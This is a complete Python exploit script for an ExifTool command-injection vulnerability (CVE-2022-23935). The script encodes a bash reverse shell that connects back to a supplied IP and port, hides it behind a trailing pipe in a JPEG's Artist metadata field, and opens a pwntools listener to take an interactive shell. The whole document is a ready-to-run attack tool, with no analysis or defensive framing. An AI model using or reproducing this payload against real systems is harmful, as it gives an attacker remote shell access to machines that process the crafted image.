CVE-2022-23935.py

#!/usr/bin/env python3

import sys
import os
import base64
from pwn import log, listen

class ExploitExiftools:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port
        self.p = log.progress("")

    def generate_payload(self):
        self.p.status("Generating payload...")
        payload = bytes(f'/bin/bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1', 'utf-8')
        encoded_payload = base64.b64encode(payload)
        img_data = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
        img_file = f"{os.path.abspath(__file__)}.jpg"
        with open(img_file, "wb") as f:
            f.write(base64.b64decode(img_data))
        encoded_cmd = encoded_payload.decode()
        cmd = f"echo {encoded_cmd} | base64 -d | bash |"
        os.system(f"exiftool -Artist='{cmd}' {img_file}")
        self.p.success(f"Payload generated and saved as {img_file}")

    def start_listener(self):
        self.p.status("Waiting for connection...")
        l = listen(self.port)
        conn = l.wait_for_connection()
        self.p.success("Connected!")
        conn.interactive()

    def run(self):
        self.generate_payload()
        self.start_listener()

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <ip> <port>")
        sys.exit(1)
    exploit = ExploitExiftools(sys.argv[1], int(sys.argv[2]))
    exploit.run()